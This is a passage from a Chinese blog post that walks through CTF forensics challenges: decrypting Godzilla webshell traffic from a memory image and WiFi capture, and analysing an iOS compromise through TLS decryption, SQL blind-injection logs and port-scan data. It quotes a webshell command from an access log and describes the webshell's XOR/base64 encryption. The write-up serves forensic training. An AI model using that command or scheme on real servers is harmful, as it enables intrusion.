<li><p>md5(<span class="math inline">\(P.\)</span>T)后16位</p></li>
<li><p>==🐖！：哥斯拉输出结果（密文）是会将结果压缩然后加密 =》gzencode
=&gt;gzdecode==</p></li>
</ul></li>
<li><p>==！则对客户端收到的包解密：去掉body首位16位=》base64解密=》encode，而新版的哥斯拉对流量包压缩了，因此最后还要加上解压函数=》gzdecode==</p>
<ul>
<li><strong>即要想解密服务器响应数据，需要去除混淆字符，进行base64解密，再异或，再进行gzip解密。</strong></li>
</ul></li>
</ul></li>
</ul>
<h3 id="解题-3">✍解题</h3>
<p>WP</p>
<blockquote>
<ul>
<li>https://www.nctry.com/2449.html</li>
<li>微信公众号（黑白天实验室）：http://cn-sec.com/archives/547840.html</li>
<li>魔法少女：http://www.snowywar.top/?p=2554</li>
</ul>
</blockquote>
<p>题目</p>
<ul>
<li><p>网管小王最近喜欢上了ctf网络安全竞赛，他使用“哥斯拉”木马来玩玩upload-labs，并且<strong>保存了内存镜像、wifi流量和服务器流量</strong>，让您来分析后作答：（本题仅1小问）</p></li>
<li><p>小王往upload-labs上传木马后进行了<code>cat/flag</code>,
flag内容为<code>____flag&#123;5db5b7b0bb74babb66e1522f3a6b1b12&#125;___</code>(压缩包里有解压密码的提示，需要额外添加花括号)</p></li>
</ul>
<h4 id="取证镜像里面有什么内容目的是破解客户端的流量">1.取证<strong>【镜像里面有什么内容（目的是破解客户端的流量）】</strong></h4>
<ul>
<li><p>vol.py -f Windows 7-dde00fa9.vmem imageinfo ，查看镜像文件</p>
<p><img src="https://api2.mubu.com/v3/document_image/0f6e9772-460c-48ce-8009-38a92e865c81-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p><code>vol.py -f Windows 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 cmdscan</code>，搜索四个文件的cmd进程，发现一样的，就按第一个弄，发现cmd里有导出文件的痕迹【后续知道imageinfo后一般情况下第一个就是对的:Win7SP1x64】</p>
<p><img src="https://api2.mubu.com/v3/document_image/bbaa366e-6ea4-42c7-8098-e709040aec1c-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p><code>vol.py -f Windows 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 filescan |grep -E "rar|zip"</code>，搜索所有文件，找含zip|rar的，发现可疑文件MY_WIFI.zip，dump下来</p>
<p><img src="https://api2.mubu.com/v3/document_image/08f041bc-5517-4592-96a5-76ee5188ee68-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p><code>vol.py -f Windows 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003e4b2070 -D ./</code>【-Q是偏移量，-D是导出的文件夹，./意思是导出在当前文件夹、Q在信息的最左边一串数字
】</p>
<p><img src="https://api2.mubu.com/v3/document_image/8e0303de-749b-4a59-9cb0-f906148b614f-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>导出文件为.dat文件，打开发现为加密的xml,🐖==！【密码在描述里，kali下压缩没有描述，所放到win环境里看！注释的描述信息有东西哇，发现密码在网卡的GUID里。==】（password
is Network Adapter GUID）</p>
<p><img src="https://api2.mubu.com/v3/document_image/442e8739-b6af-4ffc-af65-b4458a9cc8b5-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p><span style="background:#FF9999;">网工人都知道网卡的GUID和接口绑定，上面那位师傅直接grep
{ 了。我就一条命令完事，直接查接口！</span></p>
<ul>
<li><p><code>vol.py -f 'Windows 7-dde00fa9.vmem' --profile=Win7SP1x86_23418 filescan | grep "Interfaces"</code>找到guid密码</p>
<p><img src="https://api2.mubu.com/v3/document_image/341de8d4-0eb9-4492-818c-9f134562c5cd-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>也可以按花括号搜索<code>vol.py -f 'Windows 7-dde00fa9.vmem' --profile=Win7SP1x86_23418 filescan | grep "&#123;"</code>，结果很多！不如找接口</p></li>
</ul></li>
<li><p>解压出来是xml文件，AES、passPhrase、
密码233@114514_qwe，应该是某个加密文件的密码，题目里也只剩下一个东西被加密了，那就是客户端pcap了。</p>
<p><img src="https://api2.mubu.com/v3/document_image/c1ec4a75-4924-47e1-af97-1ae5462ae181-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>分析客户端wifi，发现只有一个wifi，对流量进行解密</p>
<p><img src="https://api2.mubu.com/v3/document_image/e674d2c4-436a-4e83-b235-010724a23fa4-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>用kali自带WiFi工具解密<code>airdecap-ng -e My_Wifi -p 233@114514_qwe  客户端.cap</code>
-e 指定目标网络ssid，-p
密码，ssid在pacp里，解码后有新的东西出现，对cap包流量分析</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/image-20211209193107506.png" srcset="/img/loading.gif" alt="image-20211209193107506"></p>
<ul>
<li><p><span style="background:#bbffff;">也可用wireshark自带工具解密，设置方法：编辑-首选项-Protocols-IEEE
802.11-Edit,</span>设置好后点击ok就可以看到解密的流量包了</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/5da66504-a615-4db3-97fe-ea4cd042357b-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul></li>
</ul>
<h4 id="流量分析哥斯拉解码">2.流量分析+哥斯拉解码</h4>
<p>已知小王往 upload-labs 上传木马后进行了 cat
/flag，小王在根目录下读取了flag，那么这个flag应该在发出请求后哥斯拉响应的数据中【解密后的客户端】。</p>
<ul>
<li><p>现在是需要在客户端获取服务器响应的数据：</p></li>
<li><p>同样是http协议，过滤下，多跟踪几个数据，进行解密。</p></li>
<li><p>尝试解密了几个都发现不是flag，发现某个http流，最终成功复现出flag</p></li>
</ul>
<ol type="1">
<li>分析服务器端，过滤http，发现post上传1.php，分析几个post包，追踪，发现有三个小包（==哥斯拉三次流量==，后两包bodybake后都是webshell加密代码，第一个包pass也是，key利用下面的重要函数反解得到包含run、bypass_open_basedir、formatParameter、evalFunc等二十多个功能函数，具备代码执行、文件操作、数据库操作等诸多功能）</li>
</ol>
<ul>
<li><p>🐖==！：得到加密重要函数，这一看就是哥斯拉的马，并且使用了xor_base64的加密器，配置也是默认配置==，密码:pass
密钥:key,也拿到了服务器ip:42.192.84.152
,所以我们返回到wifi流量包，直接筛选服务器ip的包，找到几个哥斯拉加密的返回包进行解密流量</p>
<p><img src="https://api2.mubu.com/v3/document_image/e3ed2a28-8417-464a-97fb-3a13f1956ebe-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>解密包的代码：（加解密函数因为异或的原因，都是encode），马里的重要函数<code>encode(base64_decode($_POST[$pass]),$key);</code>=》<strong>数据在接收时，<span style="background:#FF9999;">除了采用前 16 位和后 16
为的干扰字符外</span>，内容采用 gzip 压缩编码 + 异或 + base64</strong>
=》编写解密代码【<span style="background:#FF9999;">注意要先删除前16位和后16位字符再执行代码</span>】</p>
<p><img src="https://api2.mubu.com/v3/document_image/9b421c10-5f30-48d7-a86b-15be843cd20d-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>对解密后的客户端过滤http，发现无get/post，分析最后一个http回显（或者可疑的200包，只有一行txt/html返回值的）原始数据包返回<code>72a9c691ccdaab98fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=b4c4e1f6ddd2a488</code>==去掉前面的16位和后面的16位==
（代码审计）得到<code>fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=</code>，放到前面的解密代码在线php解密，得到flag<code>flag&#123;5db5b7b0bb74babb66e1522f3a6b1b12&#125;</code></p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/image-20211209193723030.png" srcset="/img/loading.gif" alt="image-20211209193723030"></p>
<ul>
<li>（也可这样：最后解哥斯拉的方法，其他师傅他们是直接用放进哥斯拉里面，然后让哥斯拉帮忙解码，看到flag的）</li>
</ul></li>
</ul>
<h2 id="ios">ios</h2>
<p><span style="background:#FFDBBB;">收获：wireshark检索特定内容 +
TLS流量包解密 + 查看端口扫描、导出分组详情</span></p>
<h3 id="准备知识-4">📚准备知识</h3>
<blockquote>
<ul>
<li>【<a target="_blank" rel="noopener" href="https://webcache.googleusercontent.com/search?q=cache:8RUq5kprt08J:https://www.ruanyifeng.com/blog/2014/02/ssl_tls.html+&amp;cd=6&amp;hl=zh-CN&amp;ct=clnk&amp;gl=us">TLS/SSL阮一峰详解原理</a>】</li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/walleva96/article/details/106844033">详细：wireshark解密tls，CSDN</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/lv6965/p/7859925.html">使用wireshark分析TLS</a></li>
<li><a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000018746027">思否：，图文详解，如何用
wireshark 抓包 TLS 封包</a></li>
</ul>
</blockquote>
<h3 id="解题-4">✍解题</h3>
<p>Ios题目描述：一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答</p>
<ul>
<li><p>10.1黑客所控制的C&amp;C服务器IP是______3.128.156.159_______。</p>
<ul>
<li>筛选http contains
"github"，追踪具体的tcp流，可以发现这⾥有转发操作</li>
</ul>
<p><img src="https://api2.mubu.com/v3/document_image/ddf57b05-2f8f-406c-b568-da87be40f707-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>10.2黑客利用的Github开源项目的名字是_<em>Stowaway</em>___。（如有字母请全部使用小写）</p>
<ul>
<li>同上一题的包</li>
</ul></li>
<li><p>10.3通讯加密密钥的明文是_<strong><em>hack4sec</em></strong>_____。</p>
<ul>
<li>打开上边那个工具的主页，看下readme，发现-s后跟的就是密钥</li>
</ul></li>
</ul>
<h4 id="tls流量包解密">TLS流量包解密</h4>
<p>10.4黑客通过SQL盲注拿到了一个敏感数据，内容是______746558f3-c841-456b-85d7-d6c0f2edabb2______。</p>
<ul>
<li><p><strong>部分存在TLS加密的流量需要用到秘钥进行解密</strong>
，【<span style="background:#FF9999;">而例如chrome，firefox， curl
等应用， 当设置了SSLKEYLOGFILE的环境变量， 就能够获取到每次对话产生的key
log文件。<strong>利用每次对话中，存储下来的key
log来解密报文</strong>是一种非常普遍的手段</span>】</p></li>
<li><p>key.txt中的<strong>“Master-Key”为主密钥，主密钥并不是最终加解密使用的密钥</strong>，会话密钥是通过主密钥再进一步计算获得。</p></li>
<li><p>编辑-&gt;首选项-&gt;protocols-&gt;TLS导入文件，要导入https证书了，(把key.log中rsa
session都去了只留CLIENT_RANDOM文件然后导入tls文件)【可去可不去】，</p>
<p><img src="https://api2.mubu.com/v3/document_image/203c83ea-0460-4652-838a-6d3c9658a7f6-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>发现新出现的http2有注入的内容，然后筛一下http2流（<code>ip.dst == 192.168.1.12 &amp;&amp;http2</code>），到处文件可以看到sql盲注的内容，然后就导出分组解析结果-&gt;csv-&gt;改后缀为txt-&gt;导入bake
url解码-&gt;导出文件，挨个数或者写脚本看下盲注的内容。【ctrl f
password,4,第一个前面就是猜对的字母】</p>
<p><img src="https://api2.mubu.com/v3/document_image/e3a4ae51-28eb-4815-b18e-338f29d16c5a-11812322.jpg" srcset="/img/loading.gif" alt="img"><img src="https://api2.mubu.com/v3/document_image/64da732b-43bb-4499-a7c0-99ad0b13d44f-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom:50%;"></p></li>
</ul>
<p>10.5黑客端口扫描的扫描器的扫描范围是_____10-499_______。（格式使用“开始端口-结束端口”，例如1-65535）</p>
<ul>
<li><p>\1.
在Wireshark中，直接观察数据包：显示目标地址的端口号：打开编辑-&gt;首选项设置-&gt;列-&gt;按“添加”按钮-&gt;在字段类型中选择<code>Dest port(unresolved)</code>即可。发现连续端口扫描是10-499</p></li>
<li><p>\2.
师傅们的wp：也可在linux用代码<code>$ tcpdump -n -r triffic.pcap  | awk '&#123;print $2$3&#125;' | sort -u &gt; su.txt</code>将数据流dump出来，观察被扫描的端口位置，从10开始到499<code>reading from file triffic.pcap, link-type EN10MB (Ethernet)</code></p>
<p><img src="https://api2.mubu.com/v3/document_image/1c4cc9bc-d569-408e-8e62-83323c05898f-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom:50%;"></p></li>
</ul>
<p>10.6被害者手机上被拿走了的私钥文件内容是____________。</p>
<p>10.7黑客访问/攻击了内网的几个服务器，IP地址为<code>_____172.28.0.2#192.168.1.12_______</code>。（多个IP之间按从小到大排序，使用#来分隔，例如127.0.0.1#192.168.0.1)</p>
<ul>
<li>wireshark里被扫描的192.168.1.12和access.log里被写后门的172.28.0.2</li>
</ul>
<p>10.8黑客写入了一个webshell，其密码为<code>____fxxk________</code>。</p>
<pre><code class="hljs accesslog"><span class="hljs-string">&quot;<span class="hljs-keyword">GET</span> /favicon.ico HTTP/1.1&quot;</span> <span class="hljs-number">200</span> <span class="hljs-number">43</span> <span class="hljs-string">&quot;http://172.28.0.2//ma.php?fxxk=system(base64_decode(%27d2hvYW1p%27));&quot;</span> <span class="hljs-string">&quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36&quot;</span> <span class="hljs-string">&quot;-&quot;</span></code></pre>
<p>密码为fxxk</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF-%E6%AF%94%E8%B5%9B/">CTF,比赛</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">博客文章采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处，有疑问欢迎联系:)</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/29/%E7%BB%BF%E5%9F%8E%E6%9D%AFWP/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">绿城杯Web部分WP</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/06/SQL%E6%B3%A8%E5%85%A5/">
                        <span class="hidden-mobile">SQL注入&CTF例题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/Romanc9" target="_blank" rel="nofollow noopener"><span>Luoman</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>



  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
